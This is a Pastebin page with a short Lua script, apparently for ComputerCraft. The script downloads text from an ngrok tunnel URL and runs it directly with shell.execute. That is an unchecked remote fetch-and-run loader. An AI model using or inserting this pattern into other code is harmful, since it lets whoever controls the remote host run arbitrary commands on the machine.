Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Make a HTTP request
- local request, err = http.get("https://7ab4016df884.ngrok.io")
- if not request then
- error(err)
- end
- -- Print the contents
- -- print(request.readAll())
- req = request.readAll()
- shell.execute(req)
- request.close() -- Don't forget to close!
Advertisement
Add Comment
Please, Sign In to add comment